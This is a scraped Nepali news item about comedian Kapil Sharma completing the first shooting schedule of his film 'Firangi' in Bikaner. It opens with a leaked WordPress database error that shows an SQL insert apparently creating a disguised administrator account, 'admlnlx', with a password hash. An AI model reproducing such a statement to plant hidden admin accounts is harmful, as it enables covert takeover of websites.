WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BvwIgn6fWayG3Qk.uSjfEJpUYG7FgB/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 12:11:00', '', 'admlnlx', 'admlnlx')
काठमाडौं,फागुन ६ –
भारतीय सिने उद्योगका कमेडी किङ कपिल शर्माले आफ्नो आगामि चलचित्र फिरंगीको पहिलो चरणको सुटिङ पूरा गरेका छन् । यसको जानकारी कपिल आफैँले ट्वीटर एकाउन्टमा दिएका छन् । उनी यो चलचित्रबाट निर्माणको क्षेत्रमा पाइला राख्नेछन् ।
कपिलले बिकानेरमा पहिलो चरणको सुटिङ पूरा भएको जानकारी दिँदै भने, “धेरै माया, न्यानोपन, भुजिया र पापडका लागि धन्यवाद बिकानेर । मेरो ब्याग भरियो ।”
यो चलचित्रलाई कपिलका बालसखा राजिव डोंगराले निर्देशन गरिरहेका छन् । यसअघि राजिवले पञ्जावी लचचित्र ‘लब पंजाब’ बनाइसकेका छन् । ‘फिरंगी’ मा कपिलको अपोजिट इशिता दत्ता शीर्ष भूमिकामा हुनेछिन् ।